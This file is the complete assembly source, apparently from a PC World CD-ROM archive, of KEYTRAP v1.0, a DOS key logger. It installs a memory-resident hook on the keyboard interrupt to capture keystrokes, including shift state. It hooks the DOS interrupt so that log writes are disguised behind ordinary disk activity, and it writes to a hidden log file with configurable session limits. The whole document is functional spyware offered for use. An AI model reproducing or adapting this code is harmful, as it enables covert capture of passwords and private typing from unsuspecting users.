PC World Interactive 7
PC World Interactive 7.iso
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Assembly Source File
448 lines
; KEYTRAP v1.0 - Keyboard Key Logger
; By Dcypher (dcypher@mhv.net)
; Usage: KEYTRAP <dir\logfile> /A /B /C
; A - Maximum size of log file.
; B - Number of keys to log per session.
; C - Minutes between each session.
.286 ; 286 or better
.model small ;
.code ;
org 100h ;
begin: jmp install ;
buf db 401 dup (0) ; 400 byte buffer
bufptr dw 0 ; +1 for luck :)
hide db 0 ; save int21 function call
stimem dw 0 ; grab time when done
handle dw 0 ; logfile handle
control db 0 ; control which INT to use
done_flag db 0 ; session done flag
must_write db 0 ; must-write flag
write_amount dw 0 ; amount written to disk
using_21 db 0 ; already doing an int-21
old_9a_off dw 0 ;
old_9a_seg dw 0 ;
old_9b_off dw 0 ;
old_9b_seg dw 0 ;
old_21_off dw 0 ;
old_21_seg dw 0 ;
datasegm dw 0 ; save data-segment
delaym dw 0 ; delay, in minutes
mkeys dw 0 ; maximum number of keys
logH dw 0 ; log file size
logL dw 0 ; log file size
int_9A: pushf ;
pusha ;
push es ;
push ds ;
mov ds, datasegm ; we are here
cmp control, 1 ; use this one ?
je A91 ;
call pkey ; process key (scancode)
A91: pop ds ;
pop es ;
popa ;
popf ;
jmp dword ptr old_9a_off ;
pkey: cmp done_flag, 1 ; completely done ?
je pk2 ;
cmp bufptr, 400 ; buffer limit reached ?
jae pk2 ;
in al, 60h ; get scancode
cmp al, 39h ; get downstroke and only
ja pk2 ; as far as spacebar
cmp al, 2Ah ;
je pk2 ; no shift
cmp al, 36h ;
je pk2 ; no shift
push 0 ;
pop es ;
mov ah, byte ptr es:[417h] ; shift status
test ah, 43h ; test for both shift keys
je pk1 ; and cap-lock active
add al, 80h ; show shift or cap-lock
pk1: mov di, bufptr ; in logfile
mov buf[di], al ; place scancode in buffer
inc di ;
mov bufptr, di ;
mov must_write, 1 ; try to write buffer
pk2: ret ;
int_9B: pushf ;
pusha ;
push es ;
push ds ;
mov ds, datasegm ; we are here
cmp control, 0 ; use this one ?
je B91 ; (not really needed)
call pkey ; process a key (scancode)
B91: pop ds ;
pop es ;
popa ;
popf ;
jmp dword ptr old_9b_off ;
int_21: pushf ;
pusha ;
push es ;
push ds ;
mov ds, datasegm ; here we are
cmp ax, 0ffffh ; check if already installed
je D21 ;
cmp using_21, 1 ; might need to call an
je C21 ; int-21 here so jump if
mov using_21, 1 ; called from below
mov hide, ah ; save function # for hideing
call switch ; always control the int 9's
call timer ; always check restart timer
cmp done_flag, 1 ; completely done ?
je B21 ;
cmp must_write, 1 ; need to write ?
jne B21 ;
cmp bufptr, 400 ; push a write when buffer
jae A21 ; is full
cmp hide, 3Fh ; disk read
je A21 ; (hide buffer write)
cmp hide, 40h ; disk write
je A21 ;
jmp B21 ; can't hide, try another time
A21: call saveb ; write buffer
B21: mov using_21, 0 ; no int-21 calls anymore
C21: pop ds ;
pop es ;
popa ;
popf ;
jmp dword ptr old_21_off ;
D21: pop ds ; already installed !
pop es ;
popa ;
popf ;
mov ax, 1 ; show installed
iret ;
timer: cmp done_flag, 0 ; only check time when
je timerb ; session is complete !
mov ah, 2Ch ;
int 21h ; whats the time ?
mov al, ch ;
xor ah, ah ;
mov bx, 60 ;
mul bx ; multiply hours by 60
xor ch, ch ;
add ax, cx ; add in the minutes
mov bx, stimem ;
cmp ax, bx ; is time now same as
je timerb ; when session was completed
; if so, don't do anything
xor cx, cx ;
timer1: cmp bx, 1440 ; midnight then back to 0
jb timer2 ;
xor bx, bx ;
timer2: inc cx ; minutes counter
inc bx ;
cmp ax, bx ; count untill time now
jne timer1 ;
cmp cx, delaym ;
jb timerb ; should we reset ?
mov done_flag, 0 ; reset / next session
timerb: ret ;
switch: mov ax, 3509h ;
int 21h ;
cmp bx, offset int_9A ; everything ok with 9A ?
jne sw1 ; check offset
mov control, 0 ; show who has control
ret ;
sw1: cmp control, 1 ; 9B already in use ?
je sw2 ; yes, don't do anything
mov ax, 3509h ;
int 21h ;
mov old_9b_seg, es ;
mov old_9b_off, bx ;
mov ax, 2509h ;
lea dx, int_9B ;
int 21h ; use 9B instead of 9A !
mov control, 1 ; show who has control
sw2: ret ;
saveb: mov ax, 3d01h ;
mov dx, 82h ;
int 21h ; open logfile, r/w
jc probw ;
mov handle, ax ;
mov bx, ax ;
mov ax, 4202h ;
xor cx, cx ;
xor dx, dx ;
int 21h ; point to eof
jc probw ;
mov ah, 40h ;
mov bx, handle ;
mov cx, bufptr ;
lea dx, buf ;
int 21h ; write buffer
jc probw ;
mov ah, 3Eh ;
mov bx, handle ;
int 21h ; close logfile
jc probw ;
mov cx, bufptr ; no problems writing
add write_amount, cx ; so add to written amount
mov cx, mkeys ; check number of keys logged
cmp write_amount, cx ; all done ?
jb donew ;
mov done_flag, 1 ; show session complete
mov write_amount, 0 ; written amount to 0
call gtime ; grab stop time [minutes]
donew: mov must_write, 0 ; no need to write anymore
mov bufptr, 0 ; buffer pointer back to 0
probw: ret ; try again another time
; (if problem writing)
gtime: mov ah, 2Ch ; DONE
int 21h ; grab time in minutes
mov al, ch ;
xor ah, ah ;
mov bx, 60 ;
mul bx ; multiply hours by 60
xor ch, ch ;
add ax, cx ; add in the minutes
mov stimem, ax ; start time in minutes
ret ;
install:mov bx, 80h ;
cmp byte ptr [bx], 0 ; any parameters ?
je bye ;
mov ax, 0ffffh ;
int 21h ; already installed ?
cmp ax, 1 ;
je bye ;
call conv ; convert command line numbers
jc bye ;
call clog ; check or create logfile
mov ax, 3509h ;
int 21h ;
mov old_9a_off, bx ; save old int 9
mov old_9a_seg, es ;
mov ah, 25h ;
lea dx, int_9A ;
int 21h ; hook only 9A to start
mov ax, 3521h ;
int 21h ;
mov old_21_off, bx ; save old int 21
mov old_21_seg, es ;
mov ah, 25h ;
lea dx, int_21 ;
int 21h ; point to new int 21
mov datasegm, ds ; save this datasegment area
; for later use in the ISR's
mov bx, offset install ;
mov ax, 3100h ;
mov dx, bx ;
mov cl, 04h ;
shr dx, cl ;
inc dx ;
int 21h ; end / save above install
bye: mov ah, 4Ch ; no installation
int 21h ; just end
conv: push ds ; convert command line options
pop es ;
mov di, 81h ;
conv1: inc di ;
cmp byte ptr [di], 2fh ; point to first "/"
jnz conv1 ;
inc di ; point to first number
call mconv ; convert it
jc conv4 ; any problems ?
mov logH, dx ;
mov logL, cx ; save max logfile size
add cx, dx ;
cmp cx, 0 ; make sure not 0
je conv4 ;
dec di ;
conv2: inc di ;
cmp byte ptr [di], 2fh ; point to second "/"
jnz conv2 ;
inc di ; point to first number
call mconv ; convert it
jc conv4 ; any problems ?
cmp dx, 0 ; bigger then 65535 ?
ja conv4 ;
mov mkeys, cx ; save key limit
dec di ;
conv3: inc di ;
cmp byte ptr [di], 2fh ; point to third "/"
jnz conv3 ;
inc di ; point to first number
call mconv ; convert it
jc conv4 ; any problems ?
cmp dx, 0 ;
ja conv4 ; bigger then 65535 end
cmp cx, 1440 ;
ja conv4 ; bigger then 1440 end
mov delaym, cx ; save session delay time
clc ; show no problems
ret ;
conv4: stc ; show problem
ret ;
mconv: xor cx, cx ; main converter
mov dx, cx ; no comments here, all I
mov ah, ch ; know is that it works ! :)
cld ;
dec di ;
convl: inc di ;
mov al, es:[di] ; convert number at es:[di]
xor al, '0' ;
cmp al, 10 ; carry flag will be set
jae convD ; if theres a problem
shl cx, 1 ;
rcl dx, 1 ;
jc convD ;
mov bx, cx ;
mov si, dx ;
shl cx, 1 ;
rcl dx, 1 ;
jc convD ;
shl cx, 1 ;
rcl dx, 1 ;
jc convD ;
add cx, bx ;
adc dx, si ;
jc convD ;
add cl, al ;
adc ch, 0 ;
adc dx, 0 ;
jc convD ;
jmp convl ;
convD: ret ;
clog: mov bx, 82h ; point to logfile
null1: cmp byte ptr [bx], 20h ; find first space
je null2 ;
inc bx ;
jmp null1 ;
null2: mov byte ptr [bx], 0 ; replace space with 0
mov ax, 3D01h ;
mov dx, 82h ;
int 21h ; open the file
jc clog3 ;
mov handle, ax ; good open, save handle
mov ax, 4202h ;
mov bx, handle ;
xor cx, cx ;
xor dx, dx ;
int 21h ; mov pointer to eof
cmp logH, dx ; check size
ja clog4 ; size ok
cmp logH, dx ;
je clog1 ;
jmp clog2 ; must be below, not ok
clog1: cmp logL, ax ;
ja clog4 ; size ok
clog2: mov ax, 4301h ;
mov dx, 82h ;
xor cx, cx ;
int 21h ; change file mode
mov ah, 41h ;
mov dx, 82h ;
int 21h ; delete file
clog3: mov ah, 3Ch ; create new
mov cx, 02h ; (hidden)
mov dx, 82h ;
int 21h ;
mov handle, ax ;
clog4: mov bx, handle ; close logfile handle
mov ah, 3Eh ;
int 21h ;
ret ;
end begin